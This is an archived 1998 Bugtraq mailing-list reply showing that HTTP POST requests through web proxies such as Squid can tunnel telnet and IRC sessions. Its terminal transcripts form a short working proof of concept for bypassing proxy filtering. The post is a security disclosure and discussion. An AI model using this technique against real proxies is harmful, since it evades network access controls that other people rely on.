[8210] in bugtraq
Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering
daemon@ATHENA.MIT.EDU (Peter van Dijk)
Wed Oct 14 15:17:17 1998
Mail-Followup-To: BUGTRAQ@NETSPACE.ORG
Date: Tue, 13 Oct 1998 23:08:44 +0200
Reply-To: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199810090546.HAA22037@champagne.edelweb.fr>; from
Jean-Christophe Touvet on Fri, Oct 09, 1998 at 07:46:38AM +0200
On Fri, Oct 09, 1998 at 07:46:38AM +0200, Jean-Christophe Touvet wrote:
> > Date: Thu, 08 Oct 1998 08:27:36 +0100
> > From: "Mnemonix" <mnemonix@globalnet.co.uk>
> >
> > Firstly it seems that most web-based proxies, not just MS Proxy, are
> > susceptible to this kind of attack. Thanks to Greg Jones and others for
> > doing some testing on this.
>
> HTTP POST is limited: telnet, NetBios etc. will not work, while CONNECT will
> pass them straightforward.
Very untrue. Look at this:
[hardbeat@haarlem hardbeat]$ telnet proxy 8080
Trying 194.178.232.18...
Connected to rotterdam.vuurwerk.nl.
Escape character is '^]'.
POST http://telnet:23/ HTTP/1.0
VuurWerk Internet Telnet Server
(telnet.vuurwerk.nl)
Alle transacties worden gelogged, het gebruik
van deze server is alleen voor klanten van
VuurWerk tbv. het onderhoud van hun eigen site.
POST / HTTP/1.0
Via: 1.0 rotterdam.vuurwerk.nl:8080 (Squid/1.1.21)
X-Forwarded-For: 194.178.232.22
Host: telnet.vuurwerk.nl
Cache-control: Max-age=259200
login: hardbeat
Password:
Last login: Tue Oct 13 22:59:49 from rotterdam
PID TTY STAT TIME COMMAND
5896 p6 S 0:00 /bin/login -h p8ur.cistron.nl -p
5901 p6 S 0:00 \_ -bash
6175 p6 S 0:00 \_ telnet proxy 8080
6186 p8 S 0:00 /bin/login -h rotterdam vuurwerk.nl -p
6190 p8 S 0:00 \_ -bash
6205 p8 R 0:00 \_ ps xfww
[hardbeat@haarlem hardbeat]$
Haarlem is the shellmachine here, also CNAMEd telnet. The proxy (Squid/1.1.21)
will happily forward me, and telnet works as if there's no proxy inbetween.
Another great example:
[hardbeat@haarlem hardbeat]$ telnet proxy 8080
Trying 194.178.232.18...
Connected to rotterdam.vuurwerk.nl.
Escape character is '^]'.
POST http://irc.pi.net:6667/ HTTP/1.0
nick Hardbeat2
PING :1693634679
PONG 1693634679
USER hardbeat haarlem.vuurwerk.nl irc.pi.net :Peter van Dijk (via proxy)
:Antwerpen.Be.Eu.Undernet.org 001 Hardbeat2 :Welcome to the Internet Relay Network Hardbeat2
:Antwerpen.Be.Eu.Undernet.org 002 Hardbeat2 :Your host is Antwerpen.Be.Eu.Undernet.org, running version u2.10.04
:Antwerpen.Be.Eu.Undernet.org 003 Hardbeat2 :This server was created Fri Jun 19 1998 at 18:44:36 MET DST
I can happily IRC now... imagine how easy it would be to write an IRC bouncer
that uses a proxy. Lots of proxies have NO acl or firewall around them.
The only thing I have _not_ succeeded in until now is chaining proxies with
GET or POST requests.
Greetz, Peter.
--
'I guess anybody who walks away from a root shell at : Peter van Dijk
a nerd party gets what they deserve!' -- BillSF :peter@attic.vuurwerk.nl
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
finger peter@jamaica.xs4all.nl for my public PGP-key
- --- - --- - --- - --- - --- - --- - --- - --- - --- -
